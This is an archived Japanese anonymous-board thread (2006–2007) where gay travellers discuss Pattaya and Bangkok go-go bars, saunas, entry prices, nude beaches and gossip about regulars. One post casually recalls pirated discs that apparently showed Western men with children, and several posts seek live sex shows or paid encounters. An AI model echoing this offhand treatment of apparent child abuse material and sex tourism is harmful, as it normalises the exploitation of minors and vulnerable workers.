127 :禁断の名無しさん:2006/11/08(水) 19:18:04 ID:8A/E/Gle
>>126
そんなこと聞いてどうすんの?

128 :禁断の名無しさん:2006/11/08(水) 21:15:05 ID:6MathRwc
そりゃビデオに出るのよ!

129 :禁断の名無しさん:2006/11/08(水) 23:38:29 ID:/fGbJe5N
>>126
そういや、昔はシーロムあたりでエロVCD買うと、ラベルとは全然違って
ファラン爺が子供みたいなのと戯れてる変なのが良く混ざってたねぇ。
あれは確かに景色的にパタヤっぽかった。


130 :禁断の名無しさん:2006/11/09(木) 00:37:21 ID:wcFaWVQK
>>128
ちょっと、あたしも混ぜてよ!

>>129
ゴーゴーバーのショーを隠し撮りしたVCDがあったと思うけれど
誰か持っていないの?


131 :禁断の名無しさん:2006/11/11(土) 10:17:17 ID:IigFUhgC
軍人通りっていかさまアーミーばかりじゃないの?行ってみたい気はするの。でもねえ。

132 :禁断の名無しさん:2006/11/16(木) 05:29:57 ID:W846yDwF
11月4日、パタヤでは日本人のハゲ頭を満月と勘違いした住民が
ロイクラトンを一日早めて行ったらしいです。


133 :禁断の名無しさん:2006/11/16(木) 17:03:16 ID:MVychMo0
でかいハゲだね

134 :禁断の名無しさん:2006/11/16(木) 20:54:12 ID:cjR6c4d4
132 面白くなかったわ。最近面白いことが無くて、笑いたかったのに。

135 :禁断の名無しさん:2006/11/17(金) 12:22:16 ID:fPWJ+pCG
>>132

あんたハゲに振られたの(爆)。

136 :禁断の名無しさん:2006/11/20(月) 19:32:29 ID:B4YsFZtu
whats cold its

ってどういう意味?

137 :禁断の名無しさん:2006/11/20(月) 20:32:37 ID:bdHIuvtB
Z様でしょ?わたしも一体どういう意味なのさ、って思ってましたの。

面白い英語みたいな言語を書いておられますわね。
感嘆文でwhat a cold day it is!何て寒い日なのでしょう!なのかしらん。今度は本場の桑港ですって。


138 :禁断の名無しさん:2006/11/20(月) 21:19:33 ID:JYWbhaqP
英語力もないのに自慢しようとして自爆しただけね。

139 :禁断の名無しさん:2006/11/20(月) 22:36:12 ID:qySo/uGQ
>>137
Z爺大丈夫かしら?
間違って七里の渡しで桑名港に行きそうだわ〜〜〜(爆)

140 :禁断の名無しさん:2006/11/22(水) 22:17:00 ID:mpOjsXe2
パタヤにゲイサウナは無いの?

141 :禁断の名無しさん:2006/11/22(水) 23:59:35 ID:QjqVemRj
>140
http://www.throbsplash.com/bodyclub/bodyposter2.jpg

142 :禁断の名無しさん:2006/11/23(木) 00:22:25 ID:wHNbUrwJ
>>140
♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂
    ┏━┓    ┏━━━━━┓    ┏━┓    ┏━━━━━┓┏━┓  ┏━┓
┏━┛  ┗━┓┃          ┃┏━┛  ┗━┓┃          ┃┃  ┃  ┃  ┃
┃          ┃┗━┓  ┏━┛┗━┓  ┏━┛┗━━━┓  ┃┃  ┃  ┃  ┃
┗━┓  ┏━┛┏━┛  ┗━┓┏━┛  ┗━┓        ┃  ┃┃  ┃  ┃  ┃
┏┓┃  ┃┏┓┃          ┃┗━┓  ┏━┛        ┃  ┃┃  ┃  ┃  ┃
┃┃┃  ┃┃┃┗━┓  ┏━┛┏━┛  ┗━┓        ┃  ┃┗━┛  ┃  ┃
┃┃┃  ┃┃┃    ┃  ┗━┓┃   ━ ┏━┛    ┏━┛  ┃    ┏━┛  ┃
┗┛┗━┛┗┛    ┗━━━┛┗━━━┛        ┗━━━┛    ┗━━━┛
  ┏━┓┏┳┓┏━┓┏━━┓    ┏━┓        ┏━┓            ┏━┓
┏┛  ┗┻┻┫┃  ┃┗┓  ┃┏━┛  ┗━┓┏━┛  ┗━┓        ┃  ┃
┃          ┃┃  ┃  ┃  ┃┗━┓  ┏━┛┗━┓  ┏━┛        ┃  ┃
┗┓  ┏━━┛┃  ┃  ┃  ┃┏━┛  ┃    ┏━┛  ┗━┓        ┃  ┃
  ┃  ┃┏━┓┃  ┃  ┗━┛┃ ━   ┃    ┗━┓  ┏━┛┏━━┓┗━┛
  ┃  ┃┗━┛┃  ┗━┓    ┗━┓  ┃    ┏┓┗━┛    ┗━┓┃┏━┓
  ┃  ┃┏━┓┃      ┃      ┏┛  ┃    ┃┗━━┓      ┏┛┃┃  ┃
  ┗━┛┗━┛┗━━━┛      ┗━━┛    ┗━━━┛      ┗━┛┗━┛
♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂♂

143 :禁断の名無しさん:2006/11/23(木) 00:50:17 ID:nDq2ogxw
>>140 どーもです。

144 :禁断の名無しさん:2006/11/23(木) 02:14:24 ID:qatahSMF
>>140
そこはゲイサウナじゃなくてゲイマッサージ屋でしょ?

マッサージボーイがいるようなとこじゃなくて、
バビやチャクみたいな一般ゲイが集まるサウナってあるの?

145 :禁断の名無しさん:2006/11/23(木) 14:02:12 ID:24NLmj5l
パタヤにお金の絡まないゲイ関係の子は皆無です。それを目的に来ている町なのですから

146 :禁断の名無しさん:2006/11/24(金) 00:36:35 ID:8vmeUElH
Q IC旅券を持っていることにより、GPSのように行動を追跡されることはありませんか。
A IC旅券を閉じた状態では、ICチップと外部の読み取り装置との通信は発生しませんので、追跡される心配はありません。

ttp://www.mofa.go.jp/mofaj/toko/passport/ic_faq.html#12

147 :禁断の名無しさん:2006/11/24(金) 00:46:40 ID:6kQAPrza
whats cold its

148 :禁断の名無しさん:2006/11/24(金) 10:29:28 ID:bcFF1TBB
>此処だけ佛語で書いてみたわあ。英語でちょっと間違えて書くと蠅どもが五月蠅いんでね。(笑〜〜〜)

149 :禁断の名無しさん:2006/11/24(金) 16:54:54 ID:1WV2Mp0P
英語で書かなきゃいいのにねw

150 :禁断の名無しさん:2006/11/25(土) 00:03:48 ID:6kQAPrza
ウンコにたかるハエってか??

151 :禁断の名無しさん:2006/11/26(日) 12:18:36 ID:KL0TyXMV
>>145
別にタイ人じゃなくてもいいの。
パタヤに来るゲイの観光客(ファランやアジア系)のすべてが
マネーボーイとの関係を望んでるわけじゃないんだし、
普通の仕事してるタイ人のゲイだってたくさんいるはず。

自分がもし大金持ちのタイ人だったら、パタヤにバビロンみたいな
ゲイサウナ建てるんだけどな。


152 :禁断の名無しさん:2006/12/01(金) 09:24:07 ID:/Gav96+k
このスレ、Z爺が日本にいないと書き込み少ないわ〜〜〜(笑)

153 :禁断の名無しさん:2006/12/06(水) 02:06:15 ID:PXaNCRCH
パタヤで全裸になれるビーチは無いのかしら?

154 :禁断の名無しさん:2006/12/07(木) 02:10:59 ID:X+fc2Vxx
ありません。

155 :禁断の名無しさん:2006/12/07(木) 18:32:44 ID:HoM27L7I
パタヤに限らず、どこのビーチでもなれることはなれるが
問題はそのあと始末

156 :禁断の名無しさん:2006/12/07(木) 23:38:43 ID:vfpZzyLp
しばらくブタ箱暮らしかしら?w

157 :禁断の名無しさん:2006/12/08(金) 01:28:33 ID:QSXUq+As
ゴーゴーバーのステージで毎晩お仕事w

158 :禁断の名無しさん:2006/12/10(日) 03:58:05 ID:5QH/v1k0
Zの掲示板嫌いなんすよ。だからこちらに投稿〜〜〜(爆)

san-sukはsuneeにあるHowards Guesthouseの経営者が
Le Colonial Boutique Hotel を改装して宿泊料金を二倍の一泊2500Bにするらしい。
(サウナは250B)

場所はもしかするSoi 11 Thapprayaだっちゃ。
ゴーゴーボーイもあの経営者はぼったくりだと言ってました。

159 :禁断の名無しさん:2006/12/10(日) 18:47:06 ID:qB9s/iHv
158ってほんとに貧しい性格ね。あきれるわ。

160 :禁断の名無しさん:2006/12/10(日) 21:58:59 ID:WPdeSACj
何故に貧しい性格って云えるの?

161 :禁断の名無しさん:2006/12/10(日) 22:19:34 ID:ZqnojgxF
>>158

情報提供サンクス。

>>159は本人かも知れないけど、そんな事気にしないでねw。

162 :禁断の名無しさん:2006/12/12(火) 22:15:13 ID:RaY97bhR
ヌードになって捕まったボクサー、シリモンコン?だったかな、彼って今はどうしてるの?スッごくタイプ!

163 :禁断の名無しさん:2006/12/13(水) 14:08:35 ID:S4W0tG7C
褐色の肌、イケメンサンだし、私も狙ってるのよ。ネットでヌードも見たわ。

164 :禁断の名無しさん:2006/12/15(金) 22:32:11 ID:Zsu7Qrcp
ご無沙汰です 投稿者:HIDE 投稿日:12月15日(金)03時31分32秒
BANGKOKから戻り、体調が悪くなってしまい、何年ぶりかに寝込んでしまいました
え〜junsaiさん? 一般垢すりならBANGKOKでもありますよ。

junseiって書いてんじゃん。なんでわざとらしく間違えるかな。
しかも?付きで。
シケタお釜ね。

165 :禁断の名無しさん:2006/12/21(木) 06:40:21 ID:9MeQveMZ
ギガバイトって誰がしてるの?


166 :禁断の名無しさん:2006/12/22(金) 05:52:58 ID:a/6tEOfe
年末また料金値上げかしら?

167 :禁断の名無しさん:2006/12/27(水) 13:41:19 ID:0uRWYUwy
中田氏は元気かすら?

168 :禁断の名無しさん:2006/12/31(日) 23:29:32 ID:dxUnMng1
旅先から2ちゃんねるなんて
やっている人居ないよねw

169 :禁断の名無しさん:2007/01/01(月) 03:28:14 ID:XdHmaTMb
<タイ>バンコクで同時爆弾テロ、2人死亡
12月31日22時20分配信 毎日新聞


170 :禁断の名無しさん:2007/01/01(月) 07:30:55 ID:0c4TFqmo
平和なタイにもテロの脅威が来たのね・・・
手術見合わせますだあ・・・



171 :禁断の名無しさん:2007/01/01(月) 18:23:18 ID:K0PkXFyV
Z様に以前可愛がられた妖精知ってるわ。
20代半ばというのに、人生捨てた感じでかわいそうだったわね。
今でも、飲み歩いて夜中は2○辺りに泊まってるのかしら。

172 :禁断の名無しさん:2007/01/06(土) 12:38:40 ID:ZlXXgVV+
年末のジュピターの入場料は、
なんと500バーツだったよ〜!(驚)

173 :禁断の名無しさん:2007/01/06(土) 13:05:04 ID:dHij69E9
えっ、いくらなんでもそれは冗談でしょ、
2ドリンク付くとか?
スーパースペシャルセクシーショーがあるとか?


174 :禁断の名無しさん:2007/01/07(日) 01:01:05 ID:PeULYfWU
去年は
12/31が400Bでドリンク2杯
1/1が300Bでドリンク1杯
1/2が通常料金200Bでした

175 :禁断の名無しさん:2007/01/07(日) 22:40:27 ID:Ug3bKcek
ジュピター2002って今は丸出しのショーに変更されてたの?FUCKはあったの?

176 :禁断の名無しさん:2007/01/13(土) 16:53:28 ID:DJdCONtN
トドの宿はウェルカムのワンパターンやな!


177 :禁断の名無しさん:2007/01/14(日) 04:39:49 ID:Qt1lD6Hd
禿はバンコクでもハリウッドかよ。DJとかには行けないのかよ!

178 :禁断の名無しさん:2007/01/14(日) 15:30:21 ID:iJVvJ9SG
パタヤ行ったけどロシア人がいっぱい。逆に韓国人はほとんど見なかった。

179 :禁断の名無しさん:2007/01/14(日) 22:51:20 ID:FWlo08RL
トドさん。くすぐったいは「チャッカジー」やで!
会員集めといて新しい情報全然無いな〜。

180 :禁断の名無しさん:2007/01/15(月) 11:53:43 ID:ZmzBDidc
パタヤのジョムテインビーチで原付でながして、ヘナタトゥーやらない?
って声かけてきたむっちりした可愛い兄貴元気かな?
笑顔がすごい可愛くてちょっとトキオの長瀬似でした。
雄臭ぷんぷんだったけど、頼めばやらせてくれたのかな?

181 :禁断の名無しさん:2007/01/15(月) 21:54:53 ID:VD3SHLbc
バンコクに行くんだけど生ファックショーや良い感じのバーや発展場教えて下さい!お願いします

182 :禁断の名無しさん:2007/01/16(火) 06:58:12 ID:7R89WuJx
>180
今度禿頭にヘナタトゥー試してみますわ。
私のように清潔感があればガチでやらせてくれますよ!


183 :禁断の名無しさん:2007/01/19(金) 13:22:34 ID:QvTtUYvV
トドだの禿だのZだの、タイ好きゲイの有名さんはどんな人がいるの?

184 :禁断の名無しさん:2007/01/19(金) 13:32:50 ID:6omOAAbj
今週の週刊新潮。
なでしこバンコク男漁りツアーだって、ゲイが行きづらくなるから、あんまりこういう記事書くなよ!

185 :禁断の名無しさん:2007/01/19(金) 21:37:53 ID:J6wIHuZJ
ヅラの取り外しをボーイに見られたくないから別室付きを予約するのに。

その辺を気が付かずに日記書くなよ!!

186 :禁断の名無しさん:2007/01/20(土) 08:47:31 ID:KqMFd55F
粘着肝巣

187 :禁断の名無しさん:2007/01/23(火) 02:07:15 ID:m6JuV/C1
禿がビーチで白いビキニタイプの水着をはくのは止めてください。
迷惑防止条例に違反するため禁止します。

188 :禁断の名無しさん:2007/01/24(水) 14:44:56 ID:4zGcG9FV
二月にツアーでバンコクとパタヤに行きます。
パタヤは三日間終日自由行動なんですけど
大学生でも楽しめる場所があったら教えてください。

それから、ビーチのハッテン場はどの辺りなんでしょうか?

44 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)